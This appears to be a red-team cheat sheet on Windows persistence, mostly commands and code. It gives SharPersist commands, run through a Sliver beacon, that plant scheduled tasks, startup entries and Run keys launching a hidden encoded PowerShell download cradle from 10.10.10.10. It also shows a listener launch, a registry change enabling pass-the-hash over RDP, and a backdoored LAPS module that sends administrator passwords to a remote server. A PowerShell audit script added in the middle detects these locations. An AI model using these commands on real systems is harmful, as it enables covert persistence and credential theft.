
Persistence

Persistence on Windows

The commands that include execute-assembly were run from a Sliver beacon, but they can be used from other C2 frameworks with minimal changes.

  • Task scheduler
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
execute-assembly -i -E SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -n "Updater" -m add -o hourly
  • Startup folder
execute-assembly -i -E SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -f "UserEnvSetup" -m add
  • Registry AutoRun
execute-assembly -i -E SharPersist.exe -t reg -c "C:\ProgramData\beacon.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
  • Background PowerShell task
Start-Process -FilePath ".\file.exe" -ArgumentList "10.10.10.10 9001" -NoNewWindow
  • Disable PTH restrictions on RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
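As an added defensive example (not part of the original notes), a PowerShell audit that enumerates the four locations the commands above write to: scheduled tasks that launch hidden or encoded PowerShell (with the -enc payload decoded for the analyst), startup-folder entries with their shortcut targets resolved, HKCU/HKLM Run values, and the Lsa DisableRestrictedAdmin value. Get-PersistenceFindings and Add-Finding are hypothetical names; the cmdlets, registry paths and task/shortcut properties are standard Windows ones.

```powershell
# Added defensive audit, not from the original notes. Run in an elevated PowerShell
# on the host being checked; returns one object per suspicious entry found.
function Get-PersistenceFindings {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Source, $Name, $Detail) { $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Detail = $Detail }) }
    # 1. Scheduled tasks: powershell.exe started with a hidden window and/or an encoded command
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        foreach ($action in $_.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match 'powershell' -and $cmd -match '-(e|ec|enc|encodedcommand)\s|-w(indowstyle)?\s+hidden') {
                # decode the -enc payload (UTF-16LE base64) so the analyst sees what actually runs
                if ($cmd -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
                    try { $cmd = "$cmd  =>  " + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch { }
                }
                Add-Finding 'SchTask' $_.TaskName $cmd
            }
        }
    }
    # 2. Startup folders (current user and all users); resolve .lnk targets such as SharPersist's "UserEnvSetup"
    $shell = New-Object -ComObject WScript.Shell
    foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue | ForEach-Object {
            $detail = $_.FullName
            if ($_.Extension -eq '.lnk') {
                $lnk = $shell.CreateShortcut($_.FullName)
                $detail = "$($lnk.TargetPath) $($lnk.Arguments)"
            }
            Add-Finding 'Startup' $_.Name $detail
        }
    }
    # 3. Run keys (SharPersist's "hkcurun" target and its HKLM counterpart)
    foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run', 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if ($props) {
            # skip the PSPath/PSParentPath/... properties that Get-ItemProperty adds
            $props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' } |
                ForEach-Object { Add-Finding 'RunKey' "$key\$($_.Name)" $_.Value }
        }
    }
    # 4. DisableRestrictedAdmin = 0 enables Restricted Admin mode, i.e. pass-the-hash over RDP
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    if ($null -ne $lsa -and $lsa.DisableRestrictedAdmin -eq 0) {
        Add-Finding 'Lsa' 'DisableRestrictedAdmin' 'set to 0: Restricted Admin RDP (pass-the-hash over RDP) is enabled'
    }
    return $findings
}
Get-PersistenceFindings | Format-Table -AutoSize -Wrap
```

Every startup-folder entry and Run value is listed rather than filtered, since what is legitimate differs per host; compare the output against a known-good baseline.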
  • Backdoored LAPS module (AdmPwd.PS)
// Main/AdmPwd.PS/Main.cs
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);

// log each retrieved password to a local file
var line = $"{pi.ComputerName} : {pi.Password}";
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);

WriteObject(pi);

// or make it call back to a server
using System.Net;
...
using (var client = new WebClient())
{
    client.BaseAddress = "http://10.10.10.10";

    try
    {
        client.DownloadString($"?computer={pi.ComputerName}&pass={pi.Password}");
    }
    catch
    {
        // pass
    }
}